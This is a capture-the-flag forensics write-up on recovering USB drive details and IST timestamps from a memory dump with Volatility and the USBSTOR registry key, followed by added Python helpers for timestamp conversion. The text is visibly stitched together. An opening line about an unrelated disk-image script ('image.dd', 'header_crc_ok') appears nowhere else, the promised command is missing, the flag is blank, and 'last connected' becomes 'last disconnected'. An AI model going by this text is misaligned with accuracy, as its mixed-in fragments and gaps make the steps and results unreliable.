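On the real image.dd, open(path, "rb").read() replaces build_test_image(); header_crc_ok being False is expected there and tells you the header bytes (the count included) are not to be trusted, which is exactly why the fallback scan counts the entries itself rather than believing the patched 09.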
Forensics Level 5: Universal Swindlers Bayonet
Official Hint:
Page Source :<!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->
Description: Anusandhaanic Daakus Ltd. is a company whose strength lies in the research it
conducts. Very often the employees leaving the organisation manage to carry the research data
along with them. This time the company decided to go for an investigation and called upon a forensic
investigator. This investigator captured the memory dump and shut the system down. On
resuming the system he finds that the drive has been encrypted and is left with only the memory
dump.
You as an investigator are required to find out the following information from the dump:
1) Serial No. of the external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (not nullcon.exe) resulted in the launching of nullcon.exe
Analysis: This level was all about memory dump investigation. As usual I had to look up in Google
to find some memory dump analysis tool. Came across Memoryze and Audit Viewer. I installed them
and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a
wizard which I followed accordingly. After a while I got the results in a simply formatted
way. I tried going through the windows but couldn't find anything much relevant, and ended up
getting only the last flag.
Again went through the various links and came across a tool named Volatility. Installed it and
played with it for a while. With the following working steps I got the rest of the flags:
1. I tried to locate the registry hive where we could find the external drive information.
2. The second-to-last registry hive was supposed to store all the drive information.
3. I dumped the second-to-last hive and got a very long list of registry information.
4. The challenge was to look for the external drive information. I went through a few analysis
articles and found that the USBSTOR key stores the external USB drive information.
5. Hence ended up with the following command and got the result successfully.
6. But still the flag was not yet complete: the page source revealed that the expected time
must be in IST, hence we had to add +5:30 to the times when the drive was first connected and
last disconnected.
Flag:
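Two helpers for the last steps, as an added Python example (not the author's Volatility commands; the "YYYY-MM-DD HH:MM:SS UTC+0000" text form is the timestamp format Volatility's registry plugins print and is taken here as an assumption): convert a key LastWrite time, either as a raw FILETIME or as that printed text, into IST in the page's expected "DD/MM/YYYY HH:MM:SS" form, and pull vendor, product and serial out of a USBSTOR subkey path, flagging the case where Windows generated the instance ID (second character '&') because the device reported no serial.

```python
from datetime import datetime, timedelta, timezone

IST = timezone(timedelta(hours=5, minutes=30))
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
EXPECTED_FORMAT = "%d/%m/%Y %H:%M:%S"  # "DD/MM/YYYY HH:MM:SS" from the page source


def filetime_to_ist(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC, the raw form of a
    registry key's LastWrite time) -> IST string in the expected format."""
    utc = EPOCH_1601 + timedelta(microseconds=filetime // 10)
    return utc.astimezone(IST).strftime(EXPECTED_FORMAT)


def utc_text_to_ist(text):
    """Printed UTC timestamp ("2012-01-10 10:15:44 UTC+0000") -> IST string.
    The input layout is an assumption about the tool output, see the lead-in."""
    utc = datetime.strptime(text, "%Y-%m-%d %H:%M:%S UTC+0000").replace(tzinfo=timezone.utc)
    return utc.astimezone(IST).strftime(EXPECTED_FORMAT)


def parse_usbstor_key(path):
    r"""Split a USBSTOR subkey path such as
    USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.26\4C530001234567890123&0
    into vendor, product, revision and serial. The instance ID's trailing
    '&0' is not part of the serial; an instance whose second character is
    '&' was generated by Windows because the device reported no serial."""
    parts = path.split("\\")
    device, instance = parts[-2], parts[-1]
    fields = dict(f.split("_", 1) for f in device.split("&")[1:] if "_" in f)
    serial = instance.rsplit("&", 1)[0]
    return {
        "vendor": fields.get("Ven"), "product": fields.get("Prod"),
        "revision": fields.get("Rev"), "serial": serial,
        "serial_is_real": len(serial) > 1 and serial[1] != "&",
    }
```

The constructed key path in the docstring is illustrative; the real subkey name from the hive is the serial the challenge asked for, and the "first connected" time comes from a different artefact than the USBSTOR key's LastWrite (setupapi logs or the device's own DeviceClasses key), which is why the conversion is kept separate from the lookup.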
Finally, Near The End, A Few Words:
- All the links and tools mentioned above were functioning during this write-up, and I
cannot assume they will keep working throughout.
- I apologize for any grammatical mistakes or my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree with the fact that there can be much better ways to solve the above
challenges, but eventually my ideas worked out.
- Wish Happy Hacking to Everyone.
- End, Regards To All The Members of NULL.
The epic story ends here.....
~$-THE END-$~